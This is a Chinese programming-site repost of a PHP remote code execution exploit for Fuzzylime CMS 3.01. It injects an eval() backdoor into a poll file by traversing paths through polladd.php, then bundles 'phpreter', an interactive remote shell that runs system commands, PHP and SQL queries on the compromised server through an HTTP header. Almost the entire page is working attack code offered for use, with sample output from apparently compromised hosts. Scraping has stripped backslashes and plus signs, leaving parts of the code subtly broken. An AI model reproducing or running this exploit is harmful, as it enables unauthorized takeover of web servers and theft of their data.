欢迎来到福编程网,本站提供各种互联网专业知识!

fuzzylime cms 3.01 (polladd.php poll) Remote Code Execution Exploit (php)

发布时间:1970-01-01 作者:佚名 来源:互联网
#!/usr/bin/php<?php####Fuzzylime3.01RemoteCodeExecution##Credits:Inphexandreal####[C:]#phpfuzzylime.phphttp://www.target.com/fuzzylime/##[target][cmd]#id##uid=63676(dswrealty)gid=888(vusers)groups=
#!/usr/bin/php

##

## Fuzzylime 3.01 Remote Code Execution

## Credits: Inphex and real

##

## [C:]# php fuzzylime.php http://www.target.com/fuzzylime/

## [target][cmd]# id

## uid=63676(dswrealty) gid=888(vusers) groups=33(www-data)

##

$url = $argv[1];

get($url.'code/polladd.php?poll=....//titles&log=1&_SERVER[REMOTE_ADDR]=' . urlencode('";print "-:-:-";eval(stripslashes($_SERVER['HTTP_SHELL']));print "-:-:-"; ?>') );

$shell = new phpreter($url.'code/polls/titles.inc.php', '-:-:-(.*)-:-:-', 'cmd', array(), false);

function get($url)

{

$infos = parse_url($url);

$host = $infos['host'];

$port = isset($infos['port']) ? $infos['port'] : 80;

$fp = fsockopen($host, $port, &$errno, &$errstr, 30);

$req = "GET $url HTTP/1.1rn";

$req .= "Host: $hostrn";

$req .= "User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.0; fr; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14rn";

$req .= "Connection: closernrn";

fputs($fp,$req);

fclose($fp);

}

/*

* Copyright (c) real

*

* This program is free software; you can redistribute it and/or

* modify it under the terms of the GNU General Public License

* as published by the Free Software Foundation; either version 2

* of the License, or (at your option) any later version.

*

* This program is distributed in the hope that it will be useful,

* but WITHOUT ANY WARRANTY; without even the implied warranty of

* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the

* GNU General Public License for more details.

*

* You should have received a copy of the GNU General Public License

* along with this program; if not, write to the Free Software

* Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA.

*

* TITLE: PHPreter

* AUTHOR: Charles "real" F. <charlesfol[at]hotmail.fr>

* VERSION: 1.0

* LICENSE: GNU General Public License

*

* This is a really simple class with permits to exec SQL, PHP or CMD

* on a remote host using the HTTP "Shell" header.

*

*

* Sample code:

* [host][sql]# mode=cmd

* [host][cmd]# id

* uid=2176(u47170584) gid=600(ftpusers)

*

* [host][cmd]# mode=php

* [host][php]# echo phpversion();

* 4.4.8

* [host][php]# mode=sql

* [host][sql]# SELECT version(), user()

* --------------------------------------------------

* version() | 5.0.51a-log

* user() | dbo225004932@74.208.16.148

* --------------------------------------------------

*

* [host][sql]#

*

*/

class phpreter

{

var $url;

var $host;

var $port;

var $page;

var $mode;

var $ssql;

var $prompt;

var $phost;

var $regex;

var $data;

/**

* __construct()

*

* @param url The url of the remote shell.

* @param regexp The regex to catch cmd result.

* @param mode Mode: php, sql or cmd.

* @param sql An array with the file to include,

* and sql vars

* @param clear Determines if clear() is called

* on startup

*/

function __construct($url, $regexp='^(.*)$', $mode='cmd', $sql=array(), $clear=true)

{

$this->url = $url;

$this->regex = '#'.$regexp.'#is';

#

# Set data

#

$infos = parse_url($this->url);

$this->host = $infos['host'];

$this->port = isset($infos['port']) ? $infos['port'] : 80;

$this->page = $infos['path'];

unset($infos);

# www.(site).com

$host_tmp = explode('.',$this->host);

$this->phost = $host_tmp[ count($host_tmp)-2 ];

unset($host_tmp);

#

# Set up MySQL connection string

#

if(!sizeof($sql))

$this->ssql = '';

elseif(sizeof($sql)==5)

{

$this->ssql = "include('$sql[0]');"

. "mysql_connect($sql[1], $sql[2], $sql[3]);"

. "mysql_select_db($sql[4]);";

}

else

{

$this->ssql = ""

. "mysql_connect('$sql[0]', '$sql[1]', '$sql[2]');"

. "mysql_select_db('$sql[3]');";

}

$this->setmode($mode);

#

# Main Loop

#

if($clear) $this->clear();

print $this->prompt;

while( !preg_match('#^(quit|exit|close)$#i', ($cmd = trim(fgets(STDIN)))) )

{

# change mode

if(preg_match('#^(set )?mode(=| )(sql|cmd|php)$#i',$cmd,$array))

$this->setmode($array[3]);

# clear data

elseif(preg_match('#^clear$#i',$cmd))

$this->clear();

# else

else print $this->exec($cmd);

print $this->prompt;

}

}

/**

* clear()

* Just clears ouput, printing 'n'x50

*/

function clear()

{

print str_repeat("n", 50);

return 0;

}

/**

* setmode()

* Set mode (PHP, CMD, SQL)

* You don't have to call it.

* use mode=[php|cmd|sql] instead,

* in the prompt.

*/

function setmode($newmode)

{

$this->mode = strtolower($newmode);

$this->prompt = '['.$this->phost.']['.$this->mode.']# ';

switch($this->mode)

{

case 'cmd':

$this->data = 'system('');';

break;

case 'php':

$this->data = '';

break;

case 'sql':

$this->data = $this->ssql

. '$q = mysql_query('') or print(str_repeat("-",50)."n".mysql_error()."n");'

. 'print str_repeat("-",50)."n";'

. 'while($r=mysql_fetch_array($q,MYSQL_ASSOC))'

. '{'

. 'foreach($r as $k=>$v) print " ".$k.str_repeat(" ", (20-strlen($k)))."| $vn";'

. 'print str_repeat("-",50)."n";'

. '}';

break;

}

return $this->mode;

}

/**

* exec()

* Execute any query and catch the result.

* You don't have to call it.

*/

function exec($cmd)

{

if(!strlen($this->data)) $shell = $cmd;

else $shell = str_replace('', addslashes($cmd), $this->data);

$fp = fsockopen($this->host, $this->port, &$errno, &$errstr, 30);

$req = "GET " . $this->page . " HTTP/1.1rn";

$req .= "Host: " . $this->host . ( $this->port!=80 ? ':'.$this->port : '' ) . "rn";

$req .= "User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.0; fr; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14rn";

$req .= "Shell: $shellrn";

$req .= "Connection: closernrn";

unset($shell);

fputs($fp, $req);

$content = '';

while(!feof($fp)) $content .= fgets($fp, 128);

fclose($fp);

# Remove headers

$data = explode("rnrn", $content);

$headers = array_shift($data);

$content = implode("rnrn", $data);

if(preg_match("#Transfer-Encoding:.*chunked#i", $headers))

$content = $this->unchunk($content);

preg_match($this->regex, $content, $data);

if($data[1][ strlen($data)-1 ] != "n") $data[1] .= "n";

return $data[1];

}

/**

* unchunk()

* This function aims to remove chunked content sizes which

* are putted by apache server when it uses chunked

* transfert-encoding.

*/

function unchunk($data)

{

$dsize = 1;

$offset = 0;

while($dsize>0)

{

$hsize_size = strpos($data, "rn", $offset) - $offset;

$dsize = hexdec(substr($data, $offset, $hsize_size));

# Remove $hsizern from $data

$data = substr($data, 0, $offset) . substr($data, ($offset $hsize_size 2) );

$offset = $dsize;

# Remove the rn before the next $hsize

$data = substr($data, 0, $offset) . substr($data, ($offset 2) );

}

return $data;

}

}

?>

相关推荐